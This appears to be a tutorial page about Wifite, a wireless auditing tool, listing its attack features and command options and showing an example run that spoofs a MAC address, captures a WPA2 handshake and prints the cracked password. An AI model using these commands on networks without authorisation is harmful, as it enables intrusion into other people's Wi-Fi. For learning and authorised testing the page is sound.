Wifite

Description

Wifite – To attack multiple WEP, WPA, and WPS encrypted networks in a row. This tool is customizable to be automated with only a few arguments. Wifite aims to be the “set it and forget it” wireless auditing tool.

Features:

  • sorts targets by signal strength (in dB); cracks closest access points first

  • automatically de-authenticates clients of hidden networks to reveal SSIDs

  • numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)

  • customizable settings (timeouts, packets/sec, etc)

  • “anonymous” feature; changes MAC to a random address before attacking, then changes back when attacks are complete

  • all captured WPA handshakes are backed up to wifite.py’s current directory

  • smart WPA de-authentication; cycles between all clients and broadcast deauths

  • stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit

  • displays session summary at exit; shows any cracked keys

  • all passwords saved to cracked.txt

Usage

Syntax

wifite [-h] [--check CHECK] [--cracked] [--recrack] [--all]
                 [-i INTERFACE] [--mac] [--mon-iface MONITOR_INTERFACE]
                 [-c CHANNEL] [-e ESSID] [-b BSSID] [--showb] [--nodeauth]
                 [--power POWER] [--tx TX] [--quiet] [--update] [--wpa]
                 [--wpat WPAT] [--wpadt WPADT] [--strip] [--crack]
                 [--dict DIC] [--aircrack] [--pyrit] [--tshark] [--cowpatty]
                 [--wep] [--pps PPS] [--wept WEPT] [--chopchop] [--arpreplay]
                 [--fragment] [--caffelatte] [--p0841] [--hirte]
                 [--nofakeauth] [--wepca WEPCA] [--wepsave WEPSAVE] [--wps]
                 [--pixie] [--wpst WPST] [--wpsratio WPSRATIO]
                 [--wpsretry WPSRETRY]

Options

optional arguments:
  -h, --help            show this help message and exit Wifite 

COMMAND:
  --check CHECK         Check capfile [file] for handshakes.
  --cracked             Display previously cracked access points.
  --recrack             Include already cracked networks in targets.

GLOBAL:
  --all                 Attack all targets. Wifite 
  -i INTERFACE          Wireless interface for capturing.
  --mac                 Anonymize MAC address.
  --mon-iface MONITOR_INTERFACE
                        Interface already in monitor mode.
  -c CHANNEL            Channel to scan for targets.
  -e ESSID              Target a specific access point by ssid (name).
  -b BSSID              Target a specific access point by bssid (mac).
  --showb               Display target BSSIDs after scan.
  --nodeauth            Do not deauthenticate clients while scanning
  --power POWER         Attacks any targets with signal strength > [pow].
  --tx TX               Set adapter TX power level.
  --quiet               Do not print list of APs during scan.
  --update              Check and update Wifite.

WPA:
  --wpa                 Only target WPA networks (works with --wps --wep).
  --wpat WPAT           Time to wait for WPA attack to complete (seconds).
  --wpadt WPADT         Time to wait between sending deauth packets (seconds).
  --strip               Strip handshake using tshark or pyrit.
  --crack               Crack WPA handshakes using [dic] wordlist file.
  --dict DIC            Specificy dictionary to use when cracking WPA.
  --aircrack            Verify handshake using aircrack.
  --pyrit               Verify handshake using pyrit.
  --tshark              Verify handshake using tshark.
  --cowpatty            Verify handshake using cowpatty.

WEP:
  --wep                 Only target WEP networks. Wifite 
  --pps PPS             Set the number of packets per second to inject.
  --wept WEPT           Sec to wait for each attack, 0 implies endless.
  --chopchop            Use chopchop attack.
  --arpreplay           Use arpreplay attack.
  --fragment            Use fragmentation attack.
  --caffelatte          Use caffe-latte attack.
  --p0841               Use P0842 attack.
  --hirte               Use hirte attack.
  --nofakeauth          Stop attack if fake authentication fails.
  --wepca WEPCA         Start cracking when number of IVs surpass [n].
  --wepsave WEPSAVE     Save a copy of .cap files to this directory.

WPS:
  --wps                 Only target WPS networks.
  --pixie               Only use the WPS PixieDust attack
  --wpst WPST           Max wait for new retry before giving up (0: never).
  --wpsratio WPSRATIO   Min ratio of successful PIN attempts/total retries.
  --wpsretry WPSRETRY   Max number of retries for same PIN before giving up.

Example

cyborg@cyborg:~$ sudo wifite -mac -aircrack -dict dict.txt

  .;'                     `;,    
 .;'  ,;'             `;,  `;,   WiFite v2 (r87)
.;'  ,;'  ,;'     `;,  `;,  `;,  
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'     
           /       \             

 [+] mac address anonymizing enabled
      not: only works if device is not already in monitor mode!
 [+] aircrack handshake verification enabled

 [+] scanning for wireless devices...
 [+] changing wlan0's MAC from 00:c0:ca:75:9f:e2 to 00:c0:ca:ac:81:f4... done
 [+] enabling monitor mode on wlan0... done
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
 [0:00:04] scanning wireless networks. 0 targets and 0 clients found   

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  tempztrela             1  WPA2  71db    no   clients

 [0:00:05] scanning wireless networks. 1 target and 2 clients found   




   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  tempztrela             1  WPA2  63db    no   clients

 [+] select target numbers (1-1) separated by commas, or 'all': 1

 [+] 1 target selected.

 [0:08:20] starting wpa handshake capture on "tempztrela"
 [0:08:11] new client found: 74:DE:2B:C3:A0:2F                         
 [0:08:01] new client found: D8:3C:69:76:09:96                         
 [0:07:53] listening for handshake...                     
 [0:00:27] handshake captured! saved as "hs/tempztrela_10-FE-ED-B7-A5-42.cap"

 [+] 1 attack completed:

 [+] 0/1 WPA attacks succeeded
        tempztrela (10:FE:ED:B7:A5:42) handshake captured
        saved as hs/tempztrela_10-FE-ED-B7-A5-42.cap
        
 [+] starting WPA cracker on 1 handshake
[0:00:00] cracking tempztrela with aircrack-ng
[+] Cracked tempztrela (10:FE:ED:B7:A5:42)
[+] key:   "trendztrela"
[+] quitting

 

0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?